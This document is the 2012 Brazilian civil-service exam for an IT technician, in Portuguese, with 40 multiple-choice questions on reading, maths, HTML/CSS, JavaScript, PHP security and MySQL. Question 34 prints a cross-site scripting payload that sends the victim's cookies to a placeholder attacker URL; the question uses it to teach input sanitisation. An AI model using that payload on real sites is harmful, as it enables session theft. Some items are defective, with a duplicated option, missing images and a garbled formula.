concurso público para técnico de informática – 1a fase ... · isso ocorre também dentro do...

20
Concurso público para técnico de informática – 1a fase Edital SCS 01/2012 Instruções gerais: Este é seu caderno de questões. Na última página encontra-se o gabarito. Nele você deve copiar as alternativas corretas de cada questão: apenas as respostas copiadas no gabarito serão corrigidas. Além deste caderno, você receberá também um segundo gabarito, solto, no qual poderá copiar as respostas dadas e levá-las para casa. A prova de múltipla escolha terá duração de 3 horas, contadas a partir do momento em que o Fiscal do Concurso Público declarar o início. Os candidatos que saírem antes de meia hora após o início da prova serão considerados desistentes e suas provas não serão corrigidas. Ao término das provas, os dois últimos candidatos devem sair da sala ao mesmo tempo. Em nenhuma hipótese um único candidato poderá permanecer sozinho na sala de prova com o Fiscal do Concurso Público. Será excluído do concurso público, o candidato que: não apresentar documento que o identifique no momento da prova; ausentar-se da sala sem o acompanhamento do fiscal; for surpreendido em comunicação com outras pessoas ou utilizando-se de livros, notas ou impressos; estiver portando ou fazendo uso de qualquer tipo de equipamento eletrônico de comunicação (agendas eletrônicas, telefones celulares, pagers, laptop e outros equipamentos similares); não devolver integralmente o material recebido; perturbar, de qualquer modo, a ordem dos trabalhos. Por razões de ordem técnica, de segurança e de direitos autorais adquiridos, não serão fornecidos exemplares da prova aos candidatos, mesmo após o encerramento do Concurso Público. Não serão computadas nesta prova as questões objetivas não assinaladas ou que contenham mais de uma resposta, emenda ou rasura, ainda que legível.

Upload: trinhdiep

Post on 11-Nov-2018

215 views

Category:

Documents


0 download

TRANSCRIPT

Concurso público para técnico de informática – 1a fase

Edital SCS 01/2012

Instruções gerais:

Este é seu caderno de questões. Na última página encontra-se o gabarito. Nele

você deve copiar as alternativas corretas de cada questão: apenas as respostas

copiadas no gabarito serão corrigidas.

Além deste caderno, você receberá também um segundo gabarito, solto, no

qual poderá copiar as respostas dadas e levá-las para casa.

A prova de múltipla escolha terá duração de 3 horas, contadas a partir do

momento em que o Fiscal do Concurso Público declarar o início.

Os candidatos que saírem antes de meia hora após o início da prova serão

considerados desistentes e suas provas não serão corrigidas.

Ao término das provas, os dois últimos candidatos devem sair da sala ao

mesmo tempo. Em nenhuma hipótese um único candidato poderá permanecer

sozinho na sala de prova com o Fiscal do Concurso Público.

Será excluído do concurso público, o candidato que:

não apresentar documento que o identifique no momento da prova;

ausentar-se da sala sem o acompanhamento do fiscal;

for surpreendido em comunicação com outras pessoas ou utilizando-se de

livros, notas ou impressos;

estiver portando ou fazendo uso de qualquer tipo de equipamento eletrônico de

comunicação (agendas eletrônicas, telefones celulares, pagers, laptop e outros

equipamentos similares);

não devolver integralmente o material recebido;

perturbar, de qualquer modo, a ordem dos trabalhos.

Por razões de ordem técnica, de segurança e de direitos autorais adquiridos, não serão fornecidos exemplares da prova aos candidatos, mesmo após o encerramento do Concurso Público.

Não serão computadas nesta prova as questões objetivas não assinaladas ou que contenham mais de uma resposta, emenda ou rasura, ainda que legível.

Concurso público para técnico de informática – 1a. fase

Edital SCS 01/2012

1) (TFC) Abaixo você tem cinco frases que formam o parágrafo inicial de um texto.

Ordene-as de maneira a obter um parágrafo coeso e coerente:

1) Assim também, se você decidir chamar a rosa por um outro nome, ainda assim ela

continuará sendo uma rosa.

2) Quem quiser dizer o contrário que o faça.

3) Em resumo, o nosso país é o que é.

4) Isso em nada mudará essa realidade.

5) O Brasil é um país de Terceiro Mundo.

a) 1, 2, 3, 4, 5

b) 3, 5, 1, 4, 2

c) 4, 5, 1, 2, 3

d) 5, 2, 4, 1, 3

e) 2, 4, 3, 5, 1

2) (TRE-SP) Quando conjugam três fatores – tecnologia, investimento e mercado – o

país é rico, ainda que sem recursos naturais, como é o caso do Japão ou da Noruega.

Se não se conjugam, o país pode ter recursos mas não tem riquezas, como é o caso do

Brasil e da Indonésia. Isso ocorre também dentro do mesmo país. Minas Gerais, por

exemplo, tem mais recursos minerais e menos riqueza do que São Paulo.

De acordo com o texto:

a) A conjugação dos três fatores – tecnologia, investimento e mercado – é condição

indispensável para homogeneizar a situação econômica dos diferentes países.

b) O Japão e a Noruega, assim como o Brasil e a Indonésia, igualam-se em condições

naturais de crescimento.

c) Existe uma diferença entre os recursos extraídos do solo e a riqueza provinda da

economia.

d). A coexistência da tecnologia, do investimento e do mercado garante a sustentação

dos recursos naturais.

e) Dentro do mesmo país podem ocorrer profundas diferenças na maneira de

exploração do solo.

3) (FUVEST) “O Ministério da Fazenda descobriu uma nova esperteza no Instituto de

Resseguros do Brasil. O Instituto alardeou um lucro no primeiro semestre de 3,1

bilhões de cruzeiros, que esconde na verdade um prejuízo de 2 bi. Brasil, Cuba e Costa

Rica são os três únicos países cujas empresas de resseguros são estatais.

[Veja, 1/9/93, pág. 31]

Conclui-se do texto que seu autor:

a) acredita que a esperteza do Instituto de Resseguros gerou lucro e não prejuízo.

b) dá como certo que o prejuízo do Instituto é maior do que o lucro alardeado.

c) julga que o Instituto de Resseguros agiu de boa fé.

d) dá a entender que é contrário ao fato de o Instituto de Resseguros ser estatal.

e) tem informação de que em Cuba e na Costa Rica os Institutos de Resseguros

camuflam seus prejuízos.

4) (UPE – 2012) De acordo com a tira cômica, o personagem Dilbert:

a) afirma que o telefone celular é o objeto de desejo de todas as mulheres que ele

conhece atualmente.

b) acredita que sua psicanalista, por quem ele sente atração, sabe ouvi-lo melhor que

a maioria das mulheres.

c) acha que as mulheres são, geralmente, atenciosas, embora ele não consiga se

comunicar bem com elas.

d) acha que sua psicanalista não consegue entender sua forte atração pelas mulheres

e por seu telefone celular.

e) acredita que o telefone, objeto pelo qual se diz apaixonado, tem muitas qualidades

e pode até superar as de uma mulher.

5) Leia o seguinte texto, extraído da documentação do software WordPress

(http://codex.wordpress.org/FAQ_Developer_Documentation )

Check the WordPress Plugin listing on the Plugins List on your WordPress site, or on the

WordPress Plugins Directory to determine compatibility and if updates are available. If

a WordPress Plugin update is available, it will be shown on the Dashboard Panel, an

alert on the Plugin's menu title, and on the Plugin List. Follow the instructions to

update the Plugin. If a WordPress Plugin is not compatible or updated for the next

release of WordPress, contact the Plugin author directly for information on the next

update and compatibility issues.

De acordo com o texto:

a) Todos os plugins disponíveis no site são compatíveis com todas as versões do

Wordpress.

b) Se uma atualização do plugin estiver disponível, ela vai aparecer no Painel.

c) Problemas com compatibilidade dos plugins devem ser informados à empresa

detentora dos direitos do Wordpress.

d) A instalação de plugins deve ser feita por conta e risco do usuário.

e) Os plugins instalados no Wordpress são atualizados automaticamente, sem que o

usuário perceba.

6) Leia o seguinte texto, extraído da documentação do software WordPress

(http://codex.wordpress.org/FAQ_Developer_Documentation )

Q: Why does WordPress only support MySQL? What about DB abstraction?

A: While in theory supporting more databases is better than supporting one, in

practice focusing on MySQL has a number of benefits.

First, introducing support for databases other than MySQL would increase the testing

load for all development quite a bit, as already the combinations of PHP versions, web

servers like Apache, Lighttpd, and IIS, and Windows vs Linux cause a number of issues,

multiplying that by an arbitrary number of database platforms is daunting.

Early on in WordPress' history when DB abstraction was seriously considered we

noticed packages like AdoDB were bigger than WordPress itself, which seemed like a

lot of weight for little gain.

DB independence also requires far more than just dropping in a DB abstraction class,

as basic assumptions WP makes about things like primary keys, indicies, auto

incrementing fields, LIMITs, and more vary more from DB to DB than a class could

support without serious code changes.

Finally, MySQL is ubiquitous and has shown to be fast enough and scalable enough for

the highest traffic loads, so supporting other DBs would not improve the WordPress

experience or our popularity much. As a feature request it comes up fairly infrequently.

Baseado no texto acima, assinale a afirmação correta

a) Wordpress pode ser usado com vários bancos de dados, inclusive MySQL

b) Wordpress implementa uma camada de abstração de acesso ao banco de dados

que permite o uso de vários bancos de dados.

c) O MySQL é o único banco de dados rápido e escalável suficiente para atender as

demandas do Wordpress.

d) Uma das razões de focar no MySQL como banco de dados para WordPress é que

facilita o processo de testes e controle de qualidade.

e) Wordpress terá suporte para bases de dados além de MySQL por meio de

combinações de versões de PHP e servidores Web como Apache, Lighttpd e ISS.

7) Um aplicativo Web insere uma linha por "pageview" numa tabela do Banco de

Dados. Se cada linha ocupa 20 bytes e o serviço atende 10.000 pageviews por dia, em

quanto tempo o tamanho desta tabela atinge 1 Gbyte?

a) 200 dias

b) 5000 dias

c) 500 dias

d) 20 dias

e) 1 dia

8) (ENEM 2010) Uma empresa possui um sistema de controle de qualidade que

classifica o seu desempenho financeiro anual, tendo como base o do ano anterior. Os

conceitos são: insuficiente, quando o crescimento é menor que 1%; regular, quando

o crescimento é maior ou igual a 1% e menor que 5%; bom, quando o crescimento é

maior ou igual a 5% e menor que 10%; ótimo, quando é maior ou igual a 10% e

menor que 20%; e excelente, quando é maior ou igual a 20%.

Essa empresa apresentou lucro de R$ 132 000,00 em 2008 e de R$ 145 000,00 em

2009.

De acordo com esse sistema de controle de qualidade, o desempenho financeiro dessa

empresa no ano 2009 deve ser considerado:

a) insuficiente

b) regular.

c) bom.

d) ótimo.

e) excelente.

9) (ENEM 2010) Um grupo de pacientes com Hepatite C foi submetido a um

tratamento tradicional em que 40% desses pacientes foram completamente curados.

Os pacientes que não obtiveram cura foram distribuídos em dois grupos de mesma

quantidade e submetidos a dois tratamentos inovadores. No primeiro tratamento

inovador, 35% dos pacientes foram curados e, no segundo, 45%. Em relação aos

pacientes submetidos inicialmente, os tratamentos inovadores proporcionaram cura

de:

a) 16%

b) 24%

c) 32%

d) 48%

e) 64%

10) (ENEM 2011) Nos últimos cinco anos, 32 mil mulheres de 20 a 24 anos foram

internadas nos hospitais do SUS por causa de AVC. Entre os homens da mesma faixa

etária, houve 28 mil internações pelo mesmo motivo.

[Época, 26 abr. 2010 (adaptado)]

Suponha que, nos próximos cinco anos, haja um acréscimo de 8 mil internações de

mulheres e que o acréscimo de internações de homens por AVC ocorra na mesma

proporção.

De acordo com as informações dadas, o número de homens que seriam internados por

AVC nos próximos cinco anos, corresponderia a:

a) 4 mil

b) 9 mil

c) 21 mil

d) 35 mil

e) 39 mil

11) Qual das afirmações abaixo sobre a especificação do HTML 5 é falsa?

a) O processamento de páginas é mais rígido e os navegadores não devem apresentar

a página em caso de erro de sintaxe, sendo nesse caso exibida uma mensagem de

erro padronizada.

b) A tag <video> possibilita a apresentação de vídeos em páginas.

c) O uso de eventos de Javascript padronizados possibilita a implementação de

arrastar e soltar (drag and drop) elementos HTML.

d) A API WebSocket possibilita comunicação em duas vias na mesma conexão entre

navegador e servidor, apresentando vantagens sobre o uso de técnicas como Ajax e

Comet.

e) A tag <canvas> possibilita a criação de desenhos e animações direto na página.

12) Qual regra da sintaxe XML não está sendo observada no código abaixo:

<?xml version="1.0"?>

<empresa CNPJ="51478691000115">

<dados>

<razaosocial>Papelaria YXZ</dados>

</razaosocial>

</empresa>

a) Nem todas as tags abertas estão fechadas.

b) Tags não podem estar fora de ordem.

c) Existe mais de um elemento raiz.

d) Não estão sendo preservados os espaços de linha entre as tags.

e) Os comentários estão formatados incorretamente.

13) O DNS reverso é utilizado para:

a) encontrar o nome e domínio de um computador na rede.

b) encontrar o domínio de um computador na rede.

c) encontrar o endereço IP de um computador na rede.

d) encontrar o endereço IP de um computador e suas configurações de firewall.

e) encontrar o endereço IP de um computador na rede, desde que esteja ligado.

14) Especialistas em tecnologia da Web se referem frequentemente à "separação

entre estrutura e apresentação". Qual das seguintes tecnologias se refere à

exclusivamente a apresentação de páginas na Web?

a) PHP

b) HTML

c) CSS

d) Java

e) Python

15) Considere as seguintes tecnologias:

A. Flash

B. Javascript

C. PHP

D. HTML

E. CSS

No modelo de computação denominado "cliente - servidor", quais dos códigos feitos

com as tecnologias acima podem ser executados no cliente?

a) D e E

b) B e D

c) A, B, C e E

d) B, D e E,

e) A, B, D, E

16) Aponte a diferença mais importante entre sistemas de versionamento de código

modernos (Git, Mercurial) e os sistemas mais antigos (CVS, Subversion):

a) os sistemas modernos suportam arquivos binários.

b) os sistemas modernos são muito mais rápidos.

c) os sistemas modernos permitem cada desenvolvedor trabalhar na sua própria

versão do código.

d) os sistemas modernos permitem colaboração entre desenvolvedores sem

necessidade de um repositório central (x).

e) os sistemas antigos guardam a história das revisões somente localmente.

17) Analise o trecho de algoritmo a seguir, em pseudocódigo:

Atribuir BRASIL-2014 a STR;

Atribuir 35 a GAMA

Atribuir 0 a BETA

Repetir

(se resto da divisão de GAMA por 2 igual a 1)

então imprimir STR;

Atribuir GAMA-7 a GAMA;

Se GAMA igual a 7 então atribuir 1 a BETA;

Até que BETA igual a 1;

Após a execução, o conteúdo da variável STR será impressa uma quantidade de vezes

igual a:

a) 0

b) 1

c) 2

d) 3

e) 4

18) Dado o programa abaixo, escrito em uma linguagem orientada a objetos, ao

passar como argumento uma instância da classe B para o método m3 de um objeto da

classe A, qual o resultado?

class A {

void m1() { /* faz alguma coisa */ }

void m2() { /* faz alguma coisa */ }

void m3(A x) { x.m1(); }

}

class B extends A {

void m0() { /* faz alguma coisa */ }

void m1() { /* faz alguma coisa */ }

}

a) Ocorrerá um erro de compilação.

b) Ocorrerá um erro em tempo de execução.

c) Será executado o código do método m1 definido na classe A.

d) Será executado o código do método m1 definido na classe B.

e) Serão executados os códigos dos métodos m1 definidos nas classes A e B, nessa

ordem.

19) Duas formas muito comuns de integração de sistemas distribuídos é o uso de

padrões WS-* e do padrão arquitetural REST. Comparando os dois tipos de padrão,

quais afirmações são verdadeiras?

I - As interfaces de Serviços Web WS-* são definidas usando WSDL, enquanto REST usa

uma interface uniforme, constituída pelos métodos definidos na especificação HTTP

II - O mecanismo de falhas em Serviços Web WS-* é definido na especificação SOAP,

enquanto REST usa os códigos de erro 4xx e 5xx definidos na especificação HTTP

III - Comunicação segura em serviços web WS-* é especificada por padrões como WS-

Security, WS-Trust, entre outros, enquanto REST usa HTTPS

a) I

b) II

c) III

d) II e III

e) I, II e III

20) Qual a formatação correta para definir o maior título (heading) em html?

a) <head>

b) <heading>

c) <h1>

d) <header>

e) <h6>

21) Qual a maneira correta para se fazer um hiperlink:

a) <a name="http://www.usp.br">www.usp.br</a>

b) <a>http://www.usp.br</a>

c) <a href="http://www.usp.br">usp.br</a>

d) <a url="http://www.usp.br">www.usp.br</a>

e) <a href="site://www.usp.br">usp.br</a>

22) Qual a formatação correta para ter um campo de texto no formulário (text field):

a) <input type="textfield" />

b) <textfield>

c) <input type="text" />

d) <textinput type="text" />

e) <textarea>

23) Qual o local correto no código HTML para inserir a referência externa a folha de

estilo CSS:

a) Ao final do html

b) Dentro da tag <body>

c) No topo do html

d) Dentro da tag <head>

e) Em qualquer lugar do html

24) Uma das maneiras práticas de se escrever uma folha de estilo (css) para que só o

navegador (browser) Internet Explorer entenda é:

a) <link rel="stylesheet" type="text/css" media="all" href="ie.css"/>

b) <link rel="stylesheet-for-IE" type="text/css" media="all" href="ie.css"/>

c) <!--[if IE]><link rel="stylesheet" type="text/css" media="all" href="ie.css"/><!

[endif]-->

d) [if IE]<link rel="stylesheet" type="text/css" media="all" href="ie.css"/>[endif]

e) Isso não é possível de ser feito.

25) Como adicionar uma cor de background para todos os elementos <h3>?

a) h3.all {background-color:#cccccc;}

b) all.h3 {background-color:#cccccc;}

c) h3 {background-color:#cccccc;}

d) for.h3.all {background-color:#cccccc;}

e) for.h3 {background-color:#cccccc;}

26) Aproveitando-se de boas práticas e otimização de códigos CSS, qual seria a

melhor maneira de deixar os seguintes elementos body, h1, h2 e p com margem 0?

a) .body .h1.h2 .p { margin:0 0 0 0; }

b) body h1 h2 p { margin:0px; }

c) (body h1 h2 p){ margin:0px; }

d) body,h1,h2,p { margin:0px; }

e) .body .h1.h2 .p { margin:0px; }

27) Pseudo-classes CSS são utilizadas para melhorar o controle do CSS sem que você

precise utilizar qualquer recurso de programação para modificar algum seletor

específico do CSS. No caso abaixo temos um exemplo:

<style>

div > p:first-child{

color: red;

}

</style>

E o seguinte html:

<body>

<p>O primeiro P fora de uma div.</p>

<div>

<p>O primeiro P dentro da div</p>

<p>O segundo P dentro da div</p>

<p>O terceiro P dentro da div</p>

</div>

<p>O último P fora da div</p>

</body>

Qual o resultado esperado?

a) Todos os P devem aparecer em vermelho;

b) Apenas os P dentro da DIV devem aparecer em vermelho;

c) O primeiro P fora da DIV fica em vermelho;

d) O primeiro P dentro da DIV fica em vermelho;

e) O último P fora da DIV fica em vermelho;

28) Tratando-se da linguagem JavaScript, vejamos as expressões abaixo:

A) x = "A resposta é " + 42 // retorna "A resposta é 42"

B) "37" - 7 // retorna 30

C) "37" + 7 // retorna "377"

Quais são as respostas certas?

a) Apenas a resposta A

b) Apenas a resposta B

c) Apenas a resposta C

d) As respostas A e B

e) Todas estão certas

29) Dentro de qual elemento HTML devem ser colocados os códigos JavaScript?

a) <scripting>

b) <js>

c) <javascript>

d) <script>

e) <Java Script>

30) Abaixo temos uma simples página HTML com a utilização do script Jquery:

<html>

<head>

<title>Minha página</title>

<script type="text/javascript" charset="utf-8">

function sayHello() {

$('#foo').text('Olá mundo!');

}

</script>

</head>

<body>

<h1 id="foo" onclick="sayHello()">Clique aqui!</h1>

</body>

</html>

Porém o console de erro do navegador apresenta a seguinte mensagem: Error: $ is not

defined e nada acontece porque:

a) Não foi carregada a biblioteca Jquery na página

b) A sintaxe da função está errada

c) Não foi declarado que esse é um script Jquery

d) O type do script deveria ser type="text/JQuery"

d) Todas as opções estão certas

31) A Intel produziu o seguinte infográfico mostrando o que acontece em 1 minuto na internet:

Qual alternativa é falsa?

a) Atualmente o número de devices conectado a internet é igual a população global

atual

b) O YouTube é o site atual mais importante da internet

c) Em 2015 o número de devices conectados a internet será 2 vezes o valor da

população global

d) Mais de 2 milhões de buscas são feitas no Google

e) 639.800 GB de dados são transferidos em 1 minuto

32) Considere um servidor web com interpretador php configurado corretamente e

com todos os arquivos do site em php no diretório de trabalho do servidor web.

Geralmente os sistemas em php possuem arquivos usados exclusivamente para

configurar parâmetros do programa, como a conexão ao banco de dados, esses

arquivos costumam ser incluídos no código com chamadas as funções include() ou

require(). Sob o ponto de vista da segurança do sistema qual é a extensão mais

adequada para os arquivos que serão incluídos pelas funções anteriormente citadas,

sempre visando não mostrar o código fonte que contém os parâmetros?

a) .inc

b) .include

c) .php

d) .sphp

e) .phphtml

33) Considere a seguinte árvore de diretórios em um servidor web:

-diretorio_de_sistema

-log

|- conf

|- include

|- lib

|- www

O diretório de trabalho do servidor web é o www. Em qual diretório informações

confidenciais como o arquivo de configuração do banco de dados, que contém nome

de usuário, senha e endereço do servidor de banco de dados, estarão menos

protegidas?

a) www

b) lib

c) conf

d) include

e) log

34) Um formulário possui uma área de texto que é recebida em php pelo seguinte

código:

$mensagem = isset($_POST[“areatexto”]) ? $_POST[“areatexto”] : NULL;

Esse formulário está publicado na internet e um usuário qualquer digita a seguinte

mensgem na área de texto:

<script>

document.location = 'http://sitemau.com/pegacookie.php?cookies=' +

document.cookie

</script>

Esse tipo de ataque pode ser evitado utilizando-se uma função interna do php, qual é?

a) htmlspecialchars

b) trim

c) addbackslashs

d) implode

e) html_entity_decode

35) Várias técnicas de programação podem contribuir para evitar a injeção de código

em bancos de dados, esses ataques costumamos chamar de sql injection, em php

podemos minimizar esse tipo de ataque utilizando qual função interna no tratamento

das variáveis de entrada?

a) explode

b) stripslashes

c) addslashes

d) nl2br

e) sql_regcase

36) Atualmente as aplicações web utilizam intensivamente SGBDR com SQL. É boa

prática otimizar as consultas aumentando assim a velocidade que os dados retornam

e consumindo a menor quantidade possível de recursos do servidor de banco de

dados. Como podemos otimizar consultas tipo SELECT ?

a) Utilizando-se o * como chave de busca no SELECT

b) Criando índices ( INDEX ) entre as referências das diferentes tabelas

c) Utilizando EXPLAIN na execução do SELECT

d) Utilizando-se SHOW TABLE STATUS nas diferentes tabelas da consulta

e) Utilizando CHECK TABLE

37) Ao deletarmos uma grande parte de uma tabela ou se fizermos muitas mudanças

em uma tabela que possua linhas de tamanhos variáveis ( aquelas com colunas

varchar, varbinary, blob ou text ) podemos recuperar o espaço não usado e

desfragmentar os arquivos de dados, melhorando assim o desempenho das próximas

operações na tabela. Qual comando devemos utilizar para isso ?

a) OPTIMIZE TABLE

b) REPAIR TABLE

c) ANALYZE TABLE

d) SHOW PROCESSLIST

e) RESTORE TABLE

38) Indique qual é a forma de ser fazer backup do MySQL garantindo a maior

portabilidade entre sistemas operacionais distintos e também entre versões de MySQL

diferentes:

a) Cópia dos arquivos de dados ( .frm, .MYD e .MYI ) do MySQL

b) Cópia do pool innodb

c) Cópia do último log binário do MySQL

d) Não há cópia portável entre sistemas operacionais diferentes

e) Efetuar um despejo da base

39) O programa a seguir foi escrito em pseudocódigo, o ele que faz?

Inicio

real numero1 , numero2 , numero3 , resultado

escrever "Digite o numero1:"

ler numero1

escrever "Digite o numero2:"

ler numero2

escrever "Digite o numero3:"

ler numero3

resultado <- ( numero1 + numero2 + numero3 ) / 3

escrever "Resultado: " , resultado

fim

a) Calcula uma diferença de datas

b) Calcula a aceleração de uma massa

c) Calcula a média aritmética de três números reais

d) Calcula a média aritmética de três número inteiros

e) Calcula a média harmônica de três números

40) O cálculo do índice de massa corporal é:

IMC=Ph2

onde P é o seu peso, um número Real, em Kg e h, um número Real, é a altura em m.

Qual algoritmo, escrito em pseudocódigo, calcula corretamente o IMC?

a)

inicio

real massa , altura , imc

escrever "Digite o seu peso na Terra ( Kg ):"

ler massa

escrever "Digite a sua altura ( m ):"

ler altura

imc <- ( massa / ( altura ^ 2 ) )

escrever "IMC: " , imc

fim

b)

inicio

real massa , altura , imc

escrever "Digite o seu peso na Terra ( Kg ):"

ler massa

escrever "Digite a sua altura ( m ):"

ler altura

imc <- ( massa / ( altura * 2 ) )

escrever "IMC: " , imc

fim

c)

inicio

real massa , altura , imc

escrever "Digite o seu peso na Terra ( Kg ):"

ler massa

escrever "Digite a sua altura ( m ):"

ler altura

imc <- ( massa / 2 ^ altura )

escrever "IMC: " , imc

fim

d)

inicio

real massa , altura , imc

escrever "Digite o seu peso na Terra ( Kg ):"

ler massa

escrever "Digite a sua altura ( m ):"

ler altura

imc <- ( altura / massa ^ 2 )

escrever "IMC: " , imc

fim

e)

inicio

real massa , altura , imc

escrever "Digite o seu peso na Terra ( Kg ):"

ler massa

escrever "Digite a sua altura ( m ):"

ler altura

imc <- ( altura / 2 ^ massa )

escrever "IMC: " , imc

fim

Concurso público para técnico de informática – 1a fase

Edital SCS 01/2012

Gabarito

Esta folha deve ser devolvida com a prova. Só serão corrigidas as questões

assinaladas aqui.

Questão alternativa Questão Alternativa

1 21

2 22

3 23

4 24

5 25

6 26

7 27

8 28

9 29

10 30

11 31

12 32

13 33

14 34

15 35

16 36

17 37

18 38

19 39

20 40

Nome: ___________________________________________

Assinatura: ___________________________________________